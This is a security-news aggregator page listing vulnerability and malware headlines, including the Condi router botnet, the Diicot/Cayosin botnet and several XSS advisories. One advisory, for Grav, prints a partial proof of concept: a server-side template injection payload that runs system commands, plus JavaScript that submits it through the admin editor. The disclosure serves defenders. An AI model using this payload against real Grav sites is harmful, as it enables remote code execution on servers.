Security
Headlines
HeadlinesLatestCVEs

Tag

#ssh

New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks

A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel

The Hacker News
Open in Source
#vulnerability#web#linux#ddos#dos#backdoor#botnet#auth#ssh#wifi#The Hacker News
Schneider Power Meter Vulnerability Opens Door to Power Outages

A severe security vulnerability allows credentials for the power meters to continuously transmit in cleartext, allowing device takeover.

Coursela Personal Course Selling Website 1.0 Cross Site Scripting

Coursela Personal Course Selling Website version 1.0 suffers from a cross site scripting vulnerability.

Coursemat Multi-Tenant Course Selling Website 1.1 Cross Site Scripting

Coursemat Multi-Tenant Course Selling Website version 1.1 suffers from a cross site scripting vulnerability.

RentEquip Multipurpose Rental 1.0 Cross Site Scripting

RentEquip Multipurpose Rental version 1.0 suffers from a cross site scripting vulnerability.

Polycom BToE Connector 4.4.0.0 Buffer Overflow / Man-In-The-Middle

Polycom BToE Connector version 4.4.0.0 suffers from remote buffer overflow and man-in-the-middle vulnerabilities.

From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet

Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot, revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit," Cado Security said in a technical report. "In addition,

GHSA-f9jf-4cp4-4fq5: Grav Server Side Template Injection (SSTI) vulnerability

### Summary I found an RCE(Remote Code Execution) by SSTI in the admin screen. ### Details Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. ### PoC 1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`) 2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=__unique_form_id__]").value; const payload = "{{['id']|map('system')|join}}"; // SSTI Payload const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", "...

Quicklancer Freelance Marketplace 2.4 Cross Site Scripting

Quicklancer Freelance Marketplace version 2.4 suffers from a cross site scripting vulnerability.

QuickHomes Real Estate CMS 1.3 Cross Site Scripting

QuickHomes Real Estate CMS version 1.3 suffers from a cross site scripting vulnerability.